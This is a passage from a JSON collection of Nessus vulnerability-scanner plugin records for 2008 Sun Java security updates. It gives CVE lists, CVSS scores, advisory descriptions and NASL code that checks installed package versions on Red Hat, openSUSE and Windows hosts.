value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.2\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/12/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/08/24\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2008:1018\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.6.0-sun-1.6.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.6.0-sun-1.6.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.6.0-sun-demo-1.6.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.6.0-sun-demo-1.6.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.6.0-sun-devel-1.6.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.6.0-sun-devel-1.6.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.6.0-sun-jdbc-1.6.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.6.0-sun-jdbc-1.6.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.6.0-sun-plugin-1.6.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"i586\", reference:\"java-1.6.0-sun-src-1.6.0.11-1jpp.1.el4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"java-1.6.0-sun-src-1.6.0.11-1jpp.1.el4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.6.0-sun-1.6.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-sun-1.6.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.6.0-sun-demo-1.6.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-sun-demo-1.6.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.6.0-sun-devel-1.6.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-sun-devel-1.6.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.6.0-sun-jdbc-1.6.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-sun-jdbc-1.6.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.6.0-sun-plugin-1.6.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"i586\", reference:\"java-1.6.0-sun-src-1.6.0.11-1jpp.1.el5\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"java-1.6.0-sun-src-1.6.0.11-1jpp.1.el5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1.6.0-sun / java-1.6.0-sun-demo / java-1.6.0-sun-devel / etc\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:04:22", "description": "The version update to SUN Java 1.5.0u17 fixes numerous security issues\nsuch as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)", "edition": 24, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : java-1_5_0-sun (java-1_5_0-sun-375)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2009-07-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc", "p-cpe:/a:novell:opensuse:java-1_5_0-sun", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa", "p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin"], "id": "SUSE_11_1_JAVA-1_5_0-SUN-081217.NASL", "href": "https://www.tenable.com/plugins/nessus/40235", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_5_0-sun-375.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40235);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n\n script_name(english:\"openSUSE Security Update : java-1_5_0-sun (java-1_5_0-sun-375)\");\n script_summary(english:\"Check for the java-1_5_0-sun-375 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The version update to SUN Java 1.5.0u17 fixes numerous security issues\nsuch as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=456770\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_5_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_5_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-1.5.0_update17-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-alsa-1.5.0_update17-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-devel-1.5.0_update17-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-jdbc-1.5.0_update17-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_5_0-sun-plugin-1.5.0_update17-1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_5_0-sun / java-1_5_0-sun-alsa / java-1_5_0-sun-devel / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T14:04:25", "description": "The version update to SUN Java 1.6.0_11-b03 fixes numerous security\nissues such as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)", "edition": 24, "published": "2009-07-21T00:00:00", "title": "openSUSE Security Update : java-1_6_0-sun (java-1_6_0-sun-376)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2009-07-21T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:java-1_6_0-sun", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-alsa", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-devel", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-plugin", "p-cpe:/a:novell:opensuse:java-1_6_0-sun-jdbc"], "id": "SUSE_11_1_JAVA-1_6_0-SUN-081217.NASL", "href": "https://www.tenable.com/plugins/nessus/40241", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update java-1_6_0-sun-376.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40241);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\", \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \"CVE-2008-5359\", \"CVE-2008-5360\");\n\n script_name(english:\"openSUSE Security Update : java-1_6_0-sun (java-1_6_0-sun-376)\");\n script_summary(english:\"Check for the java-1_6_0-sun-376 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The version update to SUN Java 1.6.0_11-b03 fixes numerous security\nissues such as privilege escalations. (CVE-2008-5360, CVE-2008-5359,\nCVE-2008-5358, CVE-2008-5357, CVE-2008-5356, CVE-2008-5344,\nCVE-2008-5343, CVE-2008-5342, CVE-2008-5341, CVE-2008-5340,\nCVE-2008-5339, CVE-2008-2086, CVE-2008-5355, CVE-2008-5354,\nCVE-2008-5353, CVE-2008-5352, CVE-2008-5351, CVE-2008-5350,\nCVE-2008-5349, CVE-2008-5348, CVE-2008-5347, CVE-2008-5345,\nCVE-2008-5346)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=456770\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected java-1_6_0-sun packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Calendar Deserialization Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94, 119, 189, 200, 264, 287);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-alsa\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-jdbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:java-1_6_0-sun-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2008/12/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-sun-1.6.0.u11-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-sun-alsa-1.6.0.u11-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-sun-devel-1.6.0.u11-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-sun-jdbc-1.6.0.u11-1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"java-1_6_0-sun-plugin-1.6.0.u11-1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"java-1_6_0-sun / java-1_6_0-sun-alsa / java-1_6_0-sun-devel / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:50:05", "description": "The version of Sun Java Runtime Environment (JRE) installed on the\nremote host is earlier than 6 Update 11 / 5.0 Update 17 / 1.4.2_19 /\n1.3.1_24. Such versions are potentially affected by the following\nsecurity issues :\n\n - The JRE creates temporary files with insufficiently\n random names. (244986)\n\n - There are multiple buffer overflow vulnerabilities\n involving the JRE's image processing code, its \n handling of GIF images, and its font processing.\n (244987)\n\n - It may be possible for an attacker to bypass security \n checks due to the manner in which it handles the \n 'non-shortest form' of UTF-8 byte sequences.\n\n - There are multiple security vulnerabilities in Java \n Web Start and Java Plug-in that may allow for privilege\n escalation. (244988)\n\n - The JRE Java Update mechanism does not check the digital\n signature of the JRE that it downloads. (244989)\n\n - A buffer overflow may allow an untrusted Java \n application that is launched through the commandline to \n escalate its privileges. (244990)\n\n - A vulnerability related to deserializing calendar \n objects may allow an untrusted applet or application to\n escalate its privileges. (244991)\n\n - A buffer overflow affects the 'unpack200' JAR unpacking\n utility and may allow an untrusted applet or application\n to escalate its privileges with unpacking applets and \n Java Web Start applications. (244992)\n\n - The UTF-8 decoder accepts encodings longer than the \n 'shortest' form. Although not a vulnerability per se, \n it may be leveraged to exploit software that relies on \n the JRE UTF-8 decoder to reject the 'non-shortest form'\n sequence. (245246)\n\n - An untrusted applet or application may be able to list\n the contents of the home directory of the user running \n the applet or application. (246266)\n\n - A denial of service vulnerability may be triggered when\n the JRE handles certain RSA public keys. (246286)\n\n - A vulnerability may be triggered while authenticating\n users through Kerberos and lead to a system-wide denial\n of service due to excessive consumption of operating\n system resources. (246346)\n\n - Security vulnerabilities in the JAX-WS and JAXB packages\n where internal classes can be accessed may allow an \n untrusted applet or application to escalate privileges. \n (246366)\n\n - An untrusted applet or application when parsing zip\n files may be able to read arbitrary memory locations in\n the process that the applet or application is running.\n (246386)\n\n - The JRE allows code loaded from the local filesystem to\n access localhost. (246387)", "edition": 30, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2008-12-04T00:00:00", "title": "Sun Java JRE Multiple Vulnerabilities (244986 et al)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-5344", "CVE-2008-5346", "CVE-2008-5339", "CVE-2008-5341", "CVE-2008-5340", "CVE-2008-5359", "CVE-2008-5349", "CVE-2008-5343", "CVE-2008-5352", "CVE-2008-5348", "CVE-2008-5355", "CVE-2008-5357", "CVE-2008-5360", "CVE-2008-5356", "CVE-2008-2086", "CVE-2008-5358", "CVE-2008-5342", "CVE-2008-5353", "CVE-2008-5350", "CVE-2008-5345", "CVE-2008-5347", "CVE-2008-5354", "CVE-2008-5351"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:oracle:jre"], "id": "SUN_JAVA_JRE_244986.NASL", "href": "https://www.tenable.com/plugins/nessus/35030", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(35030);\n script_version(\"1.33\");\n script_cvs_date(\"Date: 2018/11/15 20:50:28\");\n\n script_cve_id(\"CVE-2008-2086\", \"CVE-2008-5339\", \"CVE-2008-5340\", \n \"CVE-2008-5341\", \"CVE-2008-5342\", \"CVE-2008-5343\", \n \"CVE-2008-5344\", \"CVE-2008-5345\", \"CVE-2008-5346\", \n \"CVE-2008-5347\", \"CVE-2008-5348\", \"CVE-2008-5349\",\n \"CVE-2008-5350\", \"CVE-2008-5351\", \"CVE-2008-5352\", \n \"CVE-2008-5353\", \"CVE-2008-5354\", \"CVE-2008-5355\", \n \"CVE-2008-5356\", \"CVE-2008-5357\", \"CVE-2008-5358\", \n \"CVE-2008-5359\", \"CVE-2008-5360\");\n script_bugtraq_id(30633, 32608, 32620, 32892);\n\n script_name(english:\"Sun Java JRE Multiple Vulnerabilities (244986 et al)\");\n script_summary(english:\"Checks version of Sun JRE\"); \n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a runtime environment that is\naffected by multiple vulnerabilities.\" );\n script_set_attribute(attribute:\"description\", value:\n\"The version of Sun Java Runtime Environment (JRE) installed on the\nremote host is earlier than 6 Update 11 / 5.0 Update 17 / 1.4.2_19 /\n1.3.1_24. Such versions are potentially affected by the following\nsecurity issues :\n\n - The JRE creates temporary files with insufficiently\n random names. (244986)\n\n - There are multiple buffer overflow vulnerabilities\n involving the JRE's image processing code, its \n handling of GIF images, and its font processing.\n (244987)\n\n - It may be possible for an attacker to bypass security \n checks due to the manner in which it handles the \n 'non-shortest form' of UTF-8 byte sequences.\n\n - There are multiple security vulnerabilities in Java \n Web Start and Java Plug-in that may allow for privilege\n escalation. (244988)\n\n - The JRE Java Update mechanism does not check the digital\n signature of the JRE that it downloads. (244989)\n\n - A buffer overflow may allow an untrusted Java \n application that is launched through the commandline to \n escalate its privileges. (244990)\n\n - A vulnerability related to deserializing calendar \n objects may allow an untrusted applet or application to\n escalate its privileges. (244991)\n\n - A buffer overflow affects the 'unpack200' JAR unpacking\n utility and may allow an untrusted applet or application\n to escalate its privileges with unpacking applets and \n Java Web Start applications. (244992)\n\n - The UTF-8 decoder accepts encodings longer than the \n 'shortest' form. Although not a vulnerability per se, \n it may be leveraged to exploit software that relies on \n the JRE UTF-8 decoder to reject the 'non-shortest form'\n sequence. (245246)\n\n - An untrusted applet or application may be able to list\n the contents of the home directory of the user running \n the applet or application. (246266)\n\n - A denial of service vulnerability may be triggered when\n the JRE handles certain RSA public keys. (246286)\n\n - A vulnerability may be triggered while authenticating\n users through Kerberos and lead to a system-wide denial\n of service due to excessive consumption of operating\n system resources. (246346)\n\n - Security vulnerabilities in the JAX-WS and JAXB packages\n where internal classes can be accessed may allow an \n untrusted applet or application to escalate privileges. \n (246366)\n\n - An untrusted applet or application when parsing zip\n files may be able to read arbitrary memory locations in\n the process that the applet or application is running.\n (246386)\n\n - The JRE allows code loaded from the local filesystem to\n access localhost. (246387)\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019736.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019737.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019738.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019739.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019740.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019741.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019742.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019759.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019793.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019794.1.html\" );\n script_set_attribute(attribute:\"see_also\", value:\"https://download.oracle.com/sunalerts/1019797.1.html\" );\n 